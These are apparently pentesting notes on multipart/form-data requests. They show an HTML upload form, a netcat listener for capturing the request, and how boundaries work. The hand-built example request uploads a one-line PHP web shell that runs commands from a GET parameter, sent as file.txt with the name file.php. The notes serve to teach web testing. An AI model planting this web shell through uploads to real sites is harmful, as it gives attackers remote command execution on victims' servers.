HTML & netcat

First, create a file with the content of the request:

<form action="http://localhost:8000" method="post" enctype="multipart/form-data">
  <p><input type="text" name="nombre" value="jorgesito">
  <p><input type="text" name="apellido" value="alvarado">
  <p><input type="file" name="avatar">
  <p><button type="submit">Submit</button>
</form>

Create the file to upload:

echo "si buenas" > hola.txt

Then, take the port from before and listen in that port:

nc -lvp 8000

Now, open the .html file in the browser, select the file and submit the request, we will see something like:


Manually create this request

POST / HTTP/1.1

Host: localhost:8000

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:131.0) Gecko/20100101 Firefox/131.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8

Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate, br

Connection: close

Upgrade-Insecure-Requests: 1

Priority: u=0, i


Content-Length: 323

Content-Type: multipart/form-data; boundary=---divino





-----divino

Content-Disposition: form-data; name="plupload"





1


-----divino

Content-Disposition: form-data; name="name"





file.php

-----divino

Content-Disposition: form-data; name="file"; filename="file.txt"

Content-Type: application/octet-stream





<?php system($_GET["xmd"]); ?>

-----divino--

Let's keep in mind this:

Content-Type: multipart/form-data; boundary=---divino

https://www.w3.org/TR/html401/interact/forms.html#h-17.13.4.2

A boundary is used to differentiate the information traveling across the request, to "divide" and to indicate where is the start and the end of it.

In our example:

  • In the header, we define the boundary, and it has three dashes (---) next to random info.

  • In the body request, the boundary is the same, but, we need to append in the start two dashes (required). SO, if our boundary is boundary=ay, our body boundary will be: --ay.

  • In the last line of our information, the request needs that our boundary contains two dashes (--) in the final. This is to indicate the final boundary info for that part.

Last updated